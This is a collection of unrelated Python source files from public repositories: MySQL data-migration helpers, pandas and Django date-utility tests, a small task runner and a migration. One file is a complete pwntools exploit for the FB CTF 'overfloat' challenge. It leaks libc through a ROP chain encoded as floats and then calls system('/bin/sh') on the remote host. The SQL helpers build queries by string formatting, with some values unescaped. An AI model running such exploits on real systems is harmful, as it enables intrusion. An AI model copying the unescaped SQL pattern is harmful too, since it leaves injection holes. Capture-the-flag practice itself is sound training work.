now = __now_64()
__do_sql("UPDATE %s SET start_time=%d, stop_time=NULL, error_msg=NULL "
"WHERE exper_id=%d AND file='%s'" % (__dmtable, now, exper_id, fn))
# --------------------------------------------------
# Report the file migration stop event and error_msg
# if error_msg='' mark file as FAIL
# --------------------------------------------------
def file_migration_stop(exper_id, fn, error_msg=None, mark_failed=False):
now = __now_64()
if error_msg is None:
error_msg_sql = ", error_msg=NULL, status='DONE'"
elif mark_failed:
error_msg_sql = ", error_msg=NULL, status='FAIL'"
else:
error_msg_sql = ", error_msg='%s'" % __escape_string(error_msg)
__do_sql("UPDATE %s SET stop_time=%d %s WHERE exper_id=%d AND file='%s'" %
(__dmtable, now, error_msg_sql, exper_id, fn))
return
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def files2migrate(instr=None,host=None,filetype=None):
""" Report files which are yet to be migrated from the specified (if any provided)
host belonging to the specified instrument (if any provided).
Select files from instrument(s), host the file originates or filetype.
<instr> is either a instrument name or a list of instr names.
"""
exper_id_select_sql = ""
if instr:
if isinstance(instr,str):
instr_q = "i.name='%s'" % instr
elif isinstance(instr,list):
if len(instr) == 1:
instr_q = "i.name='%s'" % instr[0]
else:
instr_q = "i.name IN (%s)" % ",".join(["'%s'" % x for x in instr])
else:
instr_q=None
if instr_q:
exper_id_select_sql = "AND exper_id in (SELECT e.id FROM experiment `e`, " \
"instrument `i` WHERE %s AND e.instr_id=i.id)" % instr_q
host_sql = ""
if host is not None:
host_sql = "AND host='%s'" % host
ftype_sql = ""
if filetype:
ftype_sql = "AND file_type='%s'" % filetype
else:
ftype_sql = "AND file_type != '%s'" % "smd.xtc"
select_condition = "status = 'WAIT'"
files = __do_select_many("SELECT dm.exper_id,dm.file,dm.file_type,dm.host,dm.dirpath FROM %s `dm` "
"WHERE %s %s %s %s" %
(__dmtable, select_condition, exper_id_select_sql, host_sql, ftype_sql))
for f in files:
f['instrument'] = __do_select("SELECT i.name FROM instrument `i`, experiment `e` "
"WHERE e.id=%d AND e.instr_id=i.id" % f['exper_id'])
return files
# -------------------------------------
# Find index files that failed transfer
# -------------------------------------
def failed_idx_files(age=0):
select = ""
if age > 0:
select = "AND start_time > %d" % age
query = "SELECT exper_id,file,start_time FROM data_migration " \
"WHERE file_type = 'xtc.idx' and status = 'FAIL' %s " % select
files = __do_select_many(query)
return files
# ------------------------------------
# Get info for all experiments
# ------------------------------------
def expr_info():
data = {}
exprinfo = __do_select_many("SELECT name,posix_gid,instr_id from experiment")
for info in exprinfo:
data[info['name']] = info
instr = {}
instrinfo = __do_select_many("SELECT id,name from instrument")
for info in instrinfo:
instr[info['id']] = info['name']
return data, instr
# ----------------------------------------------------------------
# add new row to data_migration_ana for the ffb offline migration
# ----------------------------------------------------------------
def file4offline(exp_id, host, filetype, fname, dirpath):
__do_sql("""INSERT INTO data_migration_ana (exper_id,file,file_type,host,dirpath)
VALUES(%d, '%s','%s','%s','%s')""" % (exp_id, fname, filetype, host, dirpath))
# --------------------------------------------------
# Functions to keep track of file migration to NERSC
# --------------------------------------------------
def file_migration2nersc_start ( exper_id, file_name, file_type) :
exper_id = int (exper_id)
file_name = __escape_string (file_name)
file_type = __escape_string (file_type)
now = __now_64 ()
file = __do_select ("SELECT * FROM data_migration_nersc WHERE exper_id=%d AND file='%s' AND file_type='%s'" % (exper_id, file_name, file_type))
if file is None :
__do_sql ("INSERT INTO data_migration_nersc VALUES(%d,'%s','%s',%d,NULL,NULL)" % (exper_id, file_name, file_type, now))
else :
__do_sql ("UPDATE data_migration_nersc SET start_time=%d, stop_time=NULL, error_msg=NULL WHERE exper_id=%d AND file='%s' AND file_type='%s'" % (now, exper_id, file_name, file_type))
def file_migration2nersc_stop ( exper_id, file_name, file_type, error_msg=None ) :
now = __now_64 ()
exper_id = int (exper_id)
file_name = __escape_string (file_name)
file_type = __escape_string (file_type)
error_msg_sql = ", error_msg=NULL"
if error_msg is not None :
error_msg_sql = ", error_msg='%s'" % __escape_string (error_msg)
__do_sql ("UPDATE data_migration_nersc SET stop_time=%d %s WHERE exper_id=%d AND file='%s' AND file_type='%s'" % (now, error_msg_sql, exper_id, file_name, file_type))
def files2migrate2nersc(exper_id) :
select_condition = "exper_id=%d AND file_type='xtc' AND stop_time IS NOT NULL AND (error_msg IS NULL OR error_msg='0' OR error_msg='')" % int(exper_id)
# Get a list of files which have already been migrated from OFFLINE
# to NERSC and turn them into a dictionary.
migrated2nersc_dict = dict()
for file in __do_select_many ("SELECT file,file_type FROM data_migration_nersc WHERE %s" % select_condition) :
migrated2nersc_dict[file['file']] = file
# Get a list of files which have already been migrated from DAQ to OFFLINE
# and produce a list with subset of those which haven't been migrated to NERSC.
files = []
for file in __do_select_many ("SELECT file, file_type FROM data_migration WHERE %s ORDER BY file, file_type" % select_condition) :
if file['file'] not in migrated2nersc_dict :
files.append(file)
return files
# -------------------------------
# Here folow a couple of examples
# -------------------------------
if __name__ == "__main__" :
try:
print 'experiment id 47 translates into %s' % id2name(47)
print 'experiment sxrcom10 translates into id %d' % name2id('sxrcom10')
print 'data path for experiment id 116 set to %s' % getexp_datapath(116)
print 'current time is %d nanoseconds' % __now_64()
# Note that experiment id=18 corresponds to a test experiment 'amodaq09'
#
#file = 'test_file_%d.txt' % __now_64()
#file_migration_start(18,file)
#file_migration_start(18,file)
#time.sleep(1.0)
#file_migration_stop(18,file)
#time.sleep(5.0)
#file_migration_stop(18,file,"Failed 'cause of unknown reason")
#time.sleep(5.0)
#file_migration_stop(18,file)
#time.sleep(5.0)
#file_migration_stop(18,file,"Failed 'cause of unknown reason")
#time.sleep(5.0)
#file_migration_start(18,file)
#time.sleep(5.0)
#file_migration_stop(18,file)
print 'Files to be migrated from all instruments and hosts:'
for f in files2migrate():
print ' ',f
print '...and for CXI only and all hosts:'
for f in files2migrate('CXI'):
print ' ',f
print '...and for AMO only and host pslogin02:'
for f in files2migrate('AMO','pslogin02'):
print ' ',f
except db.Error, e:
print 'MySQL operation failed because of:', e
sys.exit(1)
sys.exit(0)
|
[
"wilko@SLAC.STANFORD.EDU@b967ad99-d558-0410-b138-e0f6c56caec7"
] |
wilko@SLAC.STANFORD.EDU@b967ad99-d558-0410-b138-e0f6c56caec7
|
a13219e7f39522f7f2bea3f80984f92ffcc1dbc2
|
3afc3b2a2095850503b45424df99da92cc9f3d5c
|
/app/task/taskManage.py
|
29fb5091c7bb03d6bc312b1c42ad3165a3e42868
|
[] |
no_license
|
sinly2/TestRequests
|
9b5d04cd11bae8de7d9a4dcb0fa43fc01f8eed3c
|
166d96597882790507d0d47d6c2e0093e6b31bfd
|
refs/heads/master
| 2021-05-04T06:57:42.529883
| 2017-05-17T09:36:28
| 2017-05-17T09:36:28
| 70,552,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 424
|
py
|
# -*- coding: utf-8 -*-
'''
Created on Sep 28, 2016
@author: guxiwen
'''
import sys
sys.path.append('/root/project/TestRequests')
from addRequests import addRequests
def add_requests():
addRequests.init_redis()
to_do_list = addRequests.update_svn()
print len(to_do_list)
if len(to_do_list) <> 0:
addRequests.update_redis(to_do_list)
addRequests.insert_req_into_db(to_do_list)
add_requests()
|
[
"15380794704@163.com"
] |
15380794704@163.com
|
04c1a8bc7d8b937d6cb99fc02d853e50adaabd16
|
c8cfc261d790377bedb57599c7e4e9b4a6ee60a1
|
/souvenirs/tests/test_utils.py
|
a12b76c699ae3322d62aafd6ee1631f43c687d64
|
[
"MIT"
] |
permissive
|
amygriffis/django-souvenirs
|
aa5a894b1dab7df83df4dd03bc4abcbf6773d59a
|
9aca31dd46f7433898926bd7e2f99ca4a01171f2
|
refs/heads/master
| 2021-01-18T23:42:48.307210
| 2017-04-03T14:40:04
| 2017-04-03T14:41:00
| 87,123,673
| 0
| 0
| null | 2017-04-03T21:43:01
| 2017-04-03T21:43:01
| null |
UTF-8
|
Python
| false
| false
| 4,601
|
py
|
from __future__ import absolute_import, unicode_literals
from datetime import datetime
import types
from django.utils import timezone
from souvenirs.utils import (adjust_to_calendar_month,
adjust_to_subscription_start,
iter_months, next_month, nearest_dom)
def test_adjust_to_calendar_month():
dt = timezone.make_aware(datetime(2017, 3, 27, 10, 36))
assert (adjust_to_calendar_month(dt) ==
timezone.make_aware(datetime(2017, 3, 1, 0, 0, 0, 0)))
def test_adjust_to_subscription_start():
ss = timezone.make_aware(datetime(2017, 1, 31, 23, 30))
# if dt matches ss, go with it
dt = timezone.make_aware(datetime(2017, 3, 31, 23, 30))
assert adjust_to_subscription_start(dt, ss) == dt
# if dt is after ss, simple adjust back to ss
dt = timezone.make_aware(datetime(2017, 3, 31, 23, 31))
assert (adjust_to_subscription_start(dt, ss) ==
timezone.make_aware(datetime(2017, 3, 31, 23, 30)))
# if dt is before ss, adjust back to previous month
dt = timezone.make_aware(datetime(2017, 3, 27, 10, 41))
assert (adjust_to_subscription_start(dt, ss) ==
timezone.make_aware(datetime(2017, 2, 28, 23, 30)))
# interesting scenario of dt matching adjusted ss
ss = timezone.make_aware(datetime(2016, 12, 31, 12, 0))
dt = timezone.make_aware(datetime(2017, 2, 28, 12, 0))
assert adjust_to_subscription_start(dt, ss) == dt
# interesting scenario of dt after adjusted ss
ss = timezone.make_aware(datetime(2016, 12, 31, 12, 0))
dt = timezone.make_aware(datetime(2017, 2, 28, 13, 0))
assert (adjust_to_subscription_start(dt, ss) ==
timezone.make_aware(datetime(2017, 2, 28, 12, 0)))
def test_iter_months():
start = timezone.make_aware(datetime(2015, 12, 31, 1, 2, 3))
end = timezone.make_aware(datetime(2018, 6, 10, 11, 22, 33))
months = iter_months(start, end)
assert type(months) is types.GeneratorType
starts = [
datetime.combine(datetime(year, month, day).date(), start.timetz())
for year, month, day in [
(2015, 12, 31),
(2016, 1, 31),
(2016, 2, 29), # leap!
(2016, 3, 31),
(2016, 4, 30),
(2016, 5, 31),
(2016, 6, 30),
(2016, 7, 31),
(2016, 8, 31),
(2016, 9, 30),
(2016, 10, 31),
(2016, 11, 30),
(2016, 12, 31),
(2017, 1, 31),
(2017, 2, 28),
(2017, 3, 31),
(2017, 4, 30),
(2017, 5, 31),
(2017, 6, 30),
(2017, 7, 31),
(2017, 8, 31),
(2017, 9, 30),
(2017, 10, 31),
(2017, 11, 30),
(2017, 12, 31),
(2018, 1, 31),
(2018, 2, 28),
(2018, 3, 31),
(2018, 4, 30),
(2018, 5, 31),
]
]
ends = starts[1:] + [end]
assert list(months) == list(zip(starts, ends))
def test_next_month():
dt = timezone.make_aware(datetime(2017, 3, 30, 11, 5))
assert next_month(dt) == timezone.make_aware(datetime(2017, 4, 30, 11, 5))
assert next_month(dt, delta=2) == timezone.make_aware(datetime(2017, 5, 30, 11, 5))
assert next_month(dt, delta=12) == timezone.make_aware(datetime(2018, 3, 30, 11, 5))
assert next_month(dt, delta=-1) == timezone.make_aware(datetime(2017, 2, 28, 11, 5))
assert next_month(dt, delta=-12) == timezone.make_aware(datetime(2016, 3, 30, 11, 5))
assert (next_month(dt, preferred_dom=31) ==
timezone.make_aware(datetime(2017, 4, 30, 11, 5)))
assert (next_month(dt, preferred_dom=31, delta=2)
== timezone.make_aware(datetime(2017, 5, 31, 11, 5)))
assert (next_month(dt, preferred_dom=31, delta=12)
== timezone.make_aware(datetime(2018, 3, 31, 11, 5)))
assert (next_month(dt, preferred_dom=31, delta=-1)
== timezone.make_aware(datetime(2017, 2, 28, 11, 5)))
assert (next_month(dt, preferred_dom=31, delta=-12)
== timezone.make_aware(datetime(2016, 3, 31, 11, 5)))
def test_nearest_dom():
assert nearest_dom(2017, 1, 1) == 1
assert nearest_dom(2017, 1, 31) == 31
assert nearest_dom(2017, 2, 27) == 27
assert nearest_dom(2017, 2, 28) == 28
assert nearest_dom(2017, 2, 29) == 28
assert nearest_dom(2017, 2, 30) == 28
assert nearest_dom(2017, 2, 31) == 28
|
[
"aron@scampersand.com"
] |
aron@scampersand.com
|
996c636d778f2142359b3fb35a9efac1f9340a3a
|
237d2d03f83b0a5c3a8927c316d064f674ef804b
|
/ctf/22_fbctf/overfloat/dist/exploit.py
|
e6b2f5b0febcdfda67c1e575a3345eeafd9933c6
|
[] |
no_license
|
bachzz/CTF-for-fun
|
5f0d3bf289b92b489bc2c79c1c0af0de88ad23de
|
ea6e7d8b178e7b294af58c037dc477c368da0a82
|
refs/heads/master
| 2022-02-12T21:59:45.022883
| 2019-07-02T16:22:20
| 2019-07-02T16:22:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,183
|
py
|
from pwn import *
import struct
e = ELF("./overfloat")
libc = ELF("./libc-2.27.so")
#p = process("./overfloat")
p = remote("challenges.fbctf.com", 1341)
for symbol in e.symbols:
#if "system" in symbol or "bin" in symbol:
print symbol, hex(e.symbols[symbol])
print p.recv()
pop_rdi = int("0x400a83", 16)
pop_rdi_ieee = struct.unpack('f', struct.pack('I', pop_rdi))[0]
puts_plt = e.symbols['puts']
puts_plt_ieee = struct.unpack('f', struct.pack('I', puts_plt))[0]
puts_got = e.symbols['got.puts']
puts_got_ieee = struct.unpack('f', struct.pack('I', puts_got))[0]
main = e.symbols['main']
main_ieee = struct.unpack('f', struct.pack('I', main))[0]
puts_off = int("0x809c0", 16)
binsh_off = int("0x1b3e9a", 16)
system_off = int("0x4f440", 16)
#print puts_plt_ieee
#print puts_got_ieee
payload = "1\n"*14+str(pop_rdi_ieee)+"\n0\n"+str(puts_got_ieee)+"\n0\n"+str(puts_plt_ieee)+"\n0\n"+str(main_ieee)+"\n0\n"+"done\n"
#print payload
p.send(payload)
p.recvuntil("BON VOYAGE!\n")
puts_addr = u64(p.recv(6)+'\x00\x00')
system_addr = puts_addr - puts_off + system_off
binsh_addr = puts_addr - puts_off + binsh_off
#print p.recv()
#system_addr_ieee = struct.unpack('f', struct.pack('I', system_addr))[0]
#binsh_addr_ieee = struct.unpack('f', struct.pack('I', binsh_addr))[0]
print "puts: " + hex(puts_addr)
print "system: " + hex(system_addr)#[-6*2:-4*2+1]+hex(system_addr)[-4*2:]
print "binsh: " + hex(binsh_addr)
system_addr_LHALF = hex(system_addr)[-6*2:-4*2]
system_addr_RHALF = hex(system_addr)[-4*2:]
binsh_addr_LHALF = hex(binsh_addr)[-6*2:-4*2]
binsh_addr_RHALF = hex(binsh_addr)[-4*2:]
system_addr_LHALF_ieee = struct.unpack('f', struct.pack('I', int(system_addr_LHALF,16)))[0]
system_addr_RHALF_ieee = struct.unpack('f', struct.pack('I', int(system_addr_RHALF,16)))[0]
binsh_addr_LHALF_ieee = struct.unpack('f', struct.pack('I', int(binsh_addr_LHALF, 16)))[0]
binsh_addr_RHALF_ieee = struct.unpack('f', struct.pack('I', int(binsh_addr_RHALF,16)))[0]
print system_addr_LHALF + system_addr_RHALF
print binsh_addr_LHALF + binsh_addr_RHALF
print str(pop_rdi_ieee)
print str(system_addr_LHALF_ieee) + " " + str(system_addr_RHALF_ieee)
print str(binsh_addr_LHALF_ieee) + " " + str(binsh_addr_RHALF_ieee)
payload = "1\n"*14+str(pop_rdi_ieee)+"\n0\n"+str(binsh_addr_RHALF_ieee)+"\n"+str(binsh_addr_LHALF_ieee)+"\n"+str(system_addr_RHALF_ieee)+"\n"+str(system_addr_LHALF_ieee)+"\n"+str(pop_rdi_ieee)+"\n0\n"+str(binsh_addr_RHALF_ieee)+"\n"+str(binsh_addr_LHALF_ieee)+"\n"+str(system_addr_RHALF_ieee)+"\n"+str(system_addr_LHALF_ieee)+"\n"+"done\n"
#payload = "1\n"*14+str(pop_rdi_ieee)+"\n0\n"+str(binsh_addr_LHALF_ieee)+"\n"+str(binsh_addr_RHALF_ieee)+"\n"+str(system_addr_LHALF_ieee)+"\n"+str(system_addr_RHALF_ieee)+"\n"+"done\n"
print p.recv()
#sleep(1)
p.send(payload)
#sleep(1)
print p.recv()
#payload = "1\n"*14+str(pop_rdi_ieee)+"\n0\n"+str(binsh_addr_RHALF_ieee)+"\n"+str(binsh_addr_LHALF_ieee)+"\n"+str(system_addr_LHALF_ieee)+"\n"+str(system_addr_LHALF_ieee)+"\n"+"done\n"
#p.send(payload)
p.interactive()
'''
payload = "1\n"*14+str(pop_rdi_ieee)+"\n0\n"+str(binsh_addr_ieee)+"\n0\n"+str(system_addr_ieee)+"\n0\n"+"\n0\n"+"done\n"
p.send(payload)
p.interactive()'''
|
[
"ngb1998@gmail.com"
] |
ngb1998@gmail.com
|
4e2fbfe28081ebcc9310ed6d899d397b27753623
|
d700521a2b1320c8f74789a98872da92495b143d
|
/PythonProjectsV3/Online/__init__.py
|
0621de907bc3f162d944efb1855c1b590c28ceb5
|
[] |
no_license
|
JiangYingyan/QAASproject
|
cf53a2971ccc75418de25cd98dbf344ebd03ae7b
|
51784f8ad660e8a50bdeeb62bd140116913e27d2
|
refs/heads/master
| 2020-03-19T03:02:31.622846
| 2018-07-06T07:17:50
| 2018-07-06T07:17:50
| 135,688,125
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 40
|
py
|
from Online.OnlineTest import OnlineTest
|
[
"790568256@qq.com"
] |
790568256@qq.com
|
ed06089dee606af4dbf1e8c334d5ed842f26537e
|
8f1699af1238f91673362db6cbe454d1fd2bbd8a
|
/tests/dummy_test.py
|
a6ed9bd2fc4d95d10786377043b53b02d1fc1eea
|
[] |
no_license
|
vttta/pyTest
|
9f9c204d4f4e574acbbed9009c8769ce91ce640b
|
6726dae4d52b8d5ab2deceaf69952ff5f37a2a7d
|
refs/heads/master
| 2021-04-23T17:19:06.087874
| 2020-04-02T11:26:13
| 2020-04-02T11:26:13
| 249,943,074
| 0
| 0
| null | 2020-03-25T10:00:04
| 2020-03-25T10:00:03
| null |
UTF-8
|
Python
| false
| false
| 42
|
py
|
def test_hello_world():
assert 1 == 1
|
[
"58547432+vttta@users.noreply.github.com"
] |
58547432+vttta@users.noreply.github.com
|
12f0786b5f49225d91f4716887fc6a11e4f11270
|
8233c671aa362e83ca909dd41857b653ecb58fba
|
/test_pandas_series.py
|
f9bdc94e04892b5d6a9eb93fad0c8ef95ca0ef0a
|
[] |
no_license
|
rheehot/python-test-driven-learning
|
7f3e029d7ace1c605e65955a0c823d1f58db03b1
|
443a3422d8407208a7c3e58d05fac95e3f0da65a
|
refs/heads/master
| 2022-12-19T13:53:29.367545
| 2020-09-29T20:45:29
| 2020-09-29T20:45:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,285
|
py
|
import pandas as pd
import numpy as np
def assert_array_equal(arr1, arr2):
if not np.array_equal(arr1, arr2):
raise ValueError("{} is not {}".format(arr1, arr2))
def test_isin():
s = pd.Series([1, 2, 2, 3, 3, 3])
assert_array_equal(s[s.isin([1, 2])].values, [1, 2, 2])
assert_array_equal(s[~s.isin([1, 2])].values, [3, 3, 3])
def test_replace():
s = pd.Series(['abc'])
# str replace
assert s.str.replace('b', 'a')[0] == 'aac'
# regex is True by default
assert s.str.replace(r'\w+', 'a')[0] == 'a'
# replace
assert s.replace('abc', 'aaa')[0] == 'aaa'
# it only replaces when the given value matches exactly
# when no regex=True is passed.
assert s.replace('a', 'b')[0] == 'abc'
# it can replace types other than str
assert pd.Series([0]).replace(0, 1)[0] == 1
def test_logical_not():
assert_array_equal(-pd.Series([True, False]), [False, True])
assert_array_equal(~pd.Series([True, False]), [False, True])
def test_groupby_multi_keys():
s = pd.Series([1, 2, 3, 4, 5, 6, 7, 8])
k1 = pd.Series(['a', 'a', 'a', 'a', 'b', 'b', 'b', 'b'])
k2 = pd.Series(['c', 'c', 'd', 'd', 'e', 'e', 'f', 'f'])
# a c 1.5
# d 3.5
# b e 5.5
# f 7.5
# dtype: float64
assert_array_equal(s.groupby([k1, k2]).mean(), [1.5, 3.5, 5.5, 7.5])
def test_groupby():
s = pd.Series(['a', 'b', 'b'])
# self groupby
assert s.groupby(s).agg('count').equals(
pd.Series(data=[1, 2], index=['a', 'b']))
# count - excluding missing values
assert s.groupby(s).count().equals(
pd.Series(data=[1, 2], index=['a', 'b']))
assert s.groupby(s).size().equals(pd.Series(data=[1, 2], index=['a', 'b']))
# groupby by other series
s = pd.Series([1, 1, 2])
assert s.groupby(pd.Series(['a', 'b', 'b'])).agg('sum').equals(
pd.Series(data=[1, 3], index=['a', 'b']))
assert s.groupby(pd.Series(['a', 'b', 'b'])).sum().equals(
pd.Series(data=[1, 3], index=['a', 'b']))
# https://stackoverflow.com/questions/45338209/filtering-string-float-interger-values-in-columns-pandas
def test_filter_numbers():
s = pd.Series([1, 'a', '3', '-1.1'])
assert_array_equal(
pd.to_numeric(s, errors='coerce').dropna(), [1, 3, -1.1])
assert_array_equal(s[pd.to_numeric(s, errors='coerce').notnull()],
pd.Series([1, '3', '-1.1']))
def test_values_vs_tolist():
s = pd.Series([1, 'a'])
assert type(s.values).__module__ == 'numpy'
assert type(s.values).__name__ == 'ndarray'
assert type(s.tolist()).__module__ == 'builtins'
assert type(s.tolist()).__name__ == 'list'
def test_series_category():
s = pd.Series(['A', 'B', 'C'], index=['A', 'B', 'C']).astype(
'category', categories=['C', 'B', 'A'], ordered=True)
assert len(s[s > 'B']) == 1
def test_series_dtype():
assert str(pd.Series([1]).dtype) == 'int64'
assert str(pd.Series([1, None]).dtype) == 'float64'
assert str(pd.Series(['a', None]).dtype) == 'object'
def test_series_nan():
nan = pd.Series([1, None])[1]
assert str(nan) == 'nan'
assert nan != np.nan
assert np.isnan(nan)
def test_series_dictionary():
numbers = {'one': 1, 'two': 2}
s = pd.Series(numbers)
assert_array_equal(s.index.values, ['one', 'two'])
assert_array_equal(s.values, [1, 2])
s = pd.Series([1, 2], index=['one', 'two'])
assert_array_equal(s.index.values, ['one', 'two'])
assert_array_equal(s.values, [1, 2])
s = pd.Series(s, index=['one', 'three'])
assert s[0] == 1
assert s.index[0] == 'one'
assert np.isnan(s[1])
assert s.index[1] == 'three'
def test_series_name():
s = pd.Series([1, 2], name='numbers')
assert s.name == 'numbers'
def test_querying_series():
numbers = {'one': 1, 'two': 2}
s = pd.Series(numbers)
assert s.iloc[1] == 2
assert s.loc['one'] == 1
# not recommended as labels can be number
assert s[1] == 2
assert s['one'] == 1
# vectorized calculation is much faster
assert np.sum(s) == 3
s += 2
assert np.sum(s) == 7
# append doesn't change the original object
new_s = s.append(pd.Series({'three': 3}))
assert len(s) == 2
assert len(new_s) == 3
|
[
"hammerha@gmail.com"
] |
hammerha@gmail.com
|
9a299405d30a0333140420faa7903f510448041f
|
568b96af7b2a56adf286d0aeafa2d5cf4f2a6d28
|
/test.py
|
1da3c2ca0d870052c1d87ba4dbe67dfa098bbb2a
|
[
"MIT"
] |
permissive
|
wisehackermonkey/Generator_20200324_simplified_regex
|
4995914873ffe81212838f079cac2186d0eae9b9
|
58931a5ab1e74a9d9f207e40494106fb86f048b9
|
refs/heads/master
| 2021-10-27T08:37:58.793025
| 2021-10-25T17:19:37
| 2021-10-25T17:19:37
| 249,739,872
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,814
|
py
|
# simple test function code, NOTE:does not do validation
# by oran collins
# 20200329
from generator import generator
gen = generator("[1-255].[1-255].[1-255].[1-255]")
print(gen.get())
def formater(func,_string):
if len(_string) <= 0:
print(f"{func.__name__:<30}: {_string:<30} => {func()}")
else:
print(f"{func.__name__:<30}: {_string:<30} => {func(_string)}")
test_string = "[A-C]"
test_string_number = "[1-3]"
test_string_char_selection = "[Ac4]"
test_string_controll_parens = "[1-3](command)"
test_string_controll_parens_v2 = "(command2)"
test_string_breakets = "[asdfads]"
test_string_multiple= "[A-C](command)[A-C]"
test_string_multiple2= "[[]()[]]"
test_string_multiple_only_brackets= "[A-C][A-C]"
test_string_multiple_only_brackets2= "[A-C][sts][A-C]"
test_string_multiple_only_brackets_unbalanced= "[A-C][A-C]]"
test_string_multiple_with_parens = "[A-C]()[A-C]()"
test_string_list_shorthand = "[AA,AA]"
test_string_list_shorthand_true_v1 = r"[AA,A\,A]"
test_string_list_shorthand_false = "[AAAA]"
test_string_list_shorthand_false2 = r"[AAA\(A]"
test_string_multiple_list_shorthand_true_v1 = r"[acb][123][X-Z]"
test_string_multiple_list_shorthand_true_v2 = r"[\,\(\[][123][X-Z]"
# print(gen.char_range_gen(start="a",end="c"))
# print(gen.int_range_gen(start=1,end=3))
# # Driver code
# # string = "{[]{()}}"
string = test_string_multiple
print(string, "-", "Balanced" if gen.check(string) else "Unbalanced")
print("-----------------")
formater(gen.parse_letters, test_string_number)
formater(gen.parse_numbers, test_string_number)
formater(gen.parse_char_selection, test_string_char_selection)
formater(gen.parse_parens_one, test_string_controll_parens)
formater(gen.parse_parens_one, test_string_controll_parens_v2)
formater(gen.parse_controll_characters, test_string_multiple)
formater(gen.parse_controll_characters, test_string_multiple2)
formater(gen.parse_brackets, test_string_breakets)
formater(gen.remove_letters, test_string_multiple)
formater(gen.remove_letters, test_string_multiple2)
formater(gen.parse_multiple, test_string_multiple_only_brackets)
formater(gen.parse_multiple, test_string_multiple_only_brackets2)
formater(gen.parse_multiple, test_string_multiple_only_brackets_unbalanced)
formater(gen.parse_multiple, test_string_multiple_with_parens)
formater(gen.is_short_hand, test_string_list_shorthand)
formater(gen.is_short_hand, test_string_list_shorthand_false)
formater(gen.is_short_hand, test_string_list_shorthand_false2)
formater(gen.is_short_hand, test_string_list_shorthand_true_v1)
formater(gen.parse_multiple, test_string_multiple_list_shorthand_true_v1)
formater(gen.remove_non_controll_characters, "[A-C](command)[A-C]")
formater(gen.parse_multiple, test_string_multiple_list_shorthand_true_v2)
formater(gen.get, "")
|
[
"oranbusiness@gmail.com"
] |
oranbusiness@gmail.com
|
c0f489053bc19e46cc9591c80711baca3f3cf93f
|
54cacbd6256be3f0a1b0eb06c601f363950e767c
|
/api/migrations/0002_auto_20201120_1633.py
|
496ebb4b3af4e85a0afbbd5777e8da36c0bb780b
|
[] |
no_license
|
mballard29/SocialSounds
|
5cf6b95307738579e80be17b4dc8139b4b208c3f
|
a714d0add93514fe438d0dde22f27991aaba5cf9
|
refs/heads/master
| 2023-02-17T16:27:02.168391
| 2021-01-15T03:52:39
| 2021-01-15T03:52:39
| 329,802,306
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 435
|
py
|
# Generated by Django 3.1.2 on 2020-11-20 21:33
from django.conf import settings
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('api', '0001_initial'),
]
operations = [
migrations.AlterUniqueTogether(
name='like',
unique_together={('item', 'owner')},
),
]
|
[
"mmballard29@gmail.com"
] |
mmballard29@gmail.com
|
6728b778e2b562d80d8e1f4363423e23a764180f
|
dc6d30bd1364fa9946a1fd7af61a4ce9c98dbc64
|
/py-set-discard-remove-pop/solution.py
|
e4e4613da8cbd1bea32e405dfbdd14fb58e4f38d
|
[] |
no_license
|
tamarit/hackerrank_phyton
|
4ff072fc913d33c2bb6d238fbf062a5333d009a2
|
7c3464903d96cdbf67dd9eacd64985f4e1f828ae
|
refs/heads/master
| 2021-01-01T18:19:35.327850
| 2017-08-17T09:43:01
| 2017-08-17T09:43:01
| 98,305,564
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 367
|
py
|
# https://www.hackerrank.com/challenges/py-set-discard-remove-pop
n = int(input())
s = set(map(int, input().split()))
m = int(input())
for i in range(0, m):
cmd = input().strip().split()
{
'remove':
lambda:
s.remove(int(cmd[1])),
'discard':
lambda:
s.discard(int(cmd[1])),
'pop':
lambda:
s.pop()
}[cmd[0]]()
print(sum(s))
|
[
"stamarit@software.imdea.org"
] |
stamarit@software.imdea.org
|
c81197fbccf4610700ff45258fd352c524487cef
|
a5fc03760df101bf4c23dd5635bd59767ce9e138
|
/lc/containerWithMostWater.py
|
d970fbd38f1ff13158a549a61cf340483e388c4d
|
[] |
no_license
|
MG11/DSA
|
cbb619f3d6fe772916fc1856d37edb7e2a82b664
|
5dc3a46ddfde5e1f813be9517cf75a94a4ec43f6
|
refs/heads/master
| 2023-04-20T07:34:28.098078
| 2021-05-08T17:36:06
| 2021-05-08T17:36:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,150
|
py
|
#Given n non-negative integers a1, a2, ..., an , where each represents a point at coordinate (i, ai).
# n vertical lines are drawn such that the two endpoints of the line i is at (i, ai) and (i, 0).
# Find two lines, which, together with the x-axis forms a container, such that the container contains the most water.
#Input: height = [1,8,6,2,5,4,8,3,7]
#Output: 49
#Explanation: The above vertical lines are represented by array [1,8,6,2,5,4,8,3,7]. In this case,
# the max area of water (blue section) the container can contain is 49.
class Solution:
def maxArea(self, height): # O(n^2)
result = 0
for i in range(len(height)-1):
for j in range(i+1,len(height)):
area = (j-i) * min(height[i],height[j])
result = max(result, area)
return result
class Solution:
def maxArea(self, height): # O(n)
result = 0
l,r=0,len(height)-1
while l < r:
area = (r-l) * min(height[l], height[r])
result=max(result, area)
if height[l] < height[r]:
l+=1
else:
r-=1
return result
|
[
"sankalp@webintensive.com"
] |
sankalp@webintensive.com
|
57bbbc48c3df90ccafc6950aeac2051d238a1105
|
acc8fa05cc49775fdf13c3d34177cbec8d2349a3
|
/main/migrations/0009_auto_20190513_0742.py
|
290562864b54ddd944e4c66181e2258d2e583a85
|
[] |
no_license
|
beatSpatial/paf_lite
|
f2bd6452b4c33740e2af94ac2f4056808c064117
|
37ed29f33483ff10b74e230e6de7a45231086a4e
|
refs/heads/master
| 2023-05-02T12:31:00.609020
| 2019-06-11T20:42:14
| 2019-06-11T20:42:14
| 188,784,489
| 0
| 0
| null | 2023-04-21T20:33:27
| 2019-05-27T06:31:54
|
Python
|
UTF-8
|
Python
| false
| false
| 908
|
py
|
